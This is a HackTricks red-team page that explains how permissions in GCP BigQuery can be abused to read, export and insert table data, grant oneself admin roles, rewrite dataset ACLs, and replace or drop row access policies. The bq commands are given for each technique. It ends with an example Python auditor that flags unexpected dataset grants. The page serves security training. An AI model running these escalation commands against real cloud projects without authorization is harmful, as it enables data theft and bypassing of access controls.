# GCP - BigQuery Privesc

{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

## BigQuery

For more information about BigQuery check:

{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %}
[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md)
{% endcontent-ref %}

### Read Table

Reading the information stored inside a BigQuery table it might be possible to find **sensitive information**. To access the info the permissions needed are **`bigquery.tables.get`**, **`bigquery.jobs.create`** and **`bigquery.tables.getData`**:

```bash
bq head .
bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000'
```

### Export data

This is another way to access the data. **Export it to a cloud storage bucket** and then **download the files** with the information.\
To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.

```bash
bq extract . "gs:///table*.csv"
```

### Insert data

It might be possible to **introduce certain trusted data** in a BigQuery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`**, **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:

{% code overflow="wrap" %}
```bash
# Via query
bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json
```
{% endcode %}

### `bigquery.datasets.setIamPolicy`

An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset:

```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
  --member='user:' \
  --role='roles/bigquery.admin' \
  :

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```

### `bigquery.datasets.update`, (`bigquery.datasets.get`)

This permission alone allows you to **update your access over a BigQuery dataset by modifying the ACLs** that indicate who can access it:

```bash
# Download current permissions, requires bigquery.datasets.get
bq show --format=prettyjson : > acl.json

## Give permissions to the desired user (edit acl.json first)
bq update --source acl.json :

## Read it with
bq head $PROJECT_ID:.
```

### `bigquery.tables.setIamPolicy`

An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table:

```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
  --member='user:' \
  --role='roles/bigquery.admin' \
  :.

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

According to the docs, with the mentioned permissions it's possible to **update a row policy.**\
However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

{% code overflow="wrap" %}
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY ON `..` GRANT TO ("") FILTER USING (term = "Cfba");' # An example filter was used
```
{% endcode %}

It's possible to find the filter ID in the output of the row policies enumeration. Example:

```bash
bq ls --row_access_policies :.
     Id         Filter Predicate          Grantees            Creation Time      Last Modified Time
 ------------- ------------------ ----------------------------- ----------------- --------------------
  apac_filter   term = "Cfba"      user:asd@hacktricks.xyz       21 Jan 23:32:09   21 Jan 23:32:09
```

If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:

{% code overflow="wrap" %}
```bash
# Remove one (the policy name goes before ON)
bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY ON `..`;'

# Remove all (if it's the last row policy you need to use this)
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `..`;'
```
{% endcode %}

{% hint style="danger" %}
Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see rows where `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However, this is prevented by BigQuery.
{% endhint %}
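As an added defensive counterpart to the `bigquery.datasets.update` section above (this is example code, not part of the original page or of the `bq` tool): the dataset JSON that `bq show --format=prettyjson` prints, and that `bq update --source acl.json` writes back, can be diffed against an expected baseline to spot an OWNER/WRITER grant added to an outside principal, or a public/domain-wide READER entry. The sample JSON, the baseline and every principal in it are constructed for illustration.

```python
import json

# Constructed sample of the dataset JSON printed by `bq show --format=prettyjson`
# (only the fields relevant here); all principals are made up.
SAMPLE_ACL_JSON = """
{
  "datasetReference": {"projectId": "example-proj", "datasetId": "sales"},
  "access": [
    {"role": "OWNER",  "userByEmail": "dataset-owner@example.com"},
    {"role": "WRITER", "specialGroup": "projectWriters"},
    {"role": "READER", "specialGroup": "projectReaders"},
    {"role": "OWNER",  "userByEmail": "attacker@external.xyz"},
    {"role": "READER", "iamMember":   "allAuthenticatedUsers"},
    {"view": {"projectId": "example-proj", "datasetId": "reports", "tableId": "v"}}
  ]
}
"""

# Assumed baseline for this dataset: the (role, principal kind, principal) triples
# the owning team expects to see.
EXPECTED = {
    ("OWNER", "userByEmail", "dataset-owner@example.com"),
    ("WRITER", "specialGroup", "projectWriters"),
    ("READER", "specialGroup", "projectReaders"),
}
PUBLIC = {"allUsers", "allAuthenticatedUsers"}
PRINCIPAL_KEYS = ("userByEmail", "groupByEmail", "domain", "specialGroup", "iamMember")

def principal(entry):
    """Return (kind, value) for an access entry, or None for view/routine grants."""
    for key in PRINCIPAL_KEYS:
        if key in entry:
            return key, entry[key]
    return None

def audit_dataset_acl(acl_json, expected=EXPECTED):
    """Flag dataset ACL entries that grant access beyond the expected baseline."""
    findings = []
    for entry in json.loads(acl_json).get("access", []):
        p = principal(entry)
        if p is None:  # authorized view/routine entries carry no role
            continue
        kind, value = p
        role = entry.get("role")
        if value in PUBLIC or kind == "domain":
            findings.append(("PUBLIC_OR_DOMAIN_WIDE", role, value))
        elif (role, kind, value) not in expected:
            findings.append(("UNEXPECTED_GRANT", role, value))
    return findings

if __name__ == "__main__":
    for finding in audit_dataset_acl(SAMPLE_ACL_JSON):
        print("%-22s %-7s %s" % finding)
```

Run it against the real `acl.json` by reading the file into `audit_dataset_acl` and replacing `EXPECTED` with the dataset's documented grants.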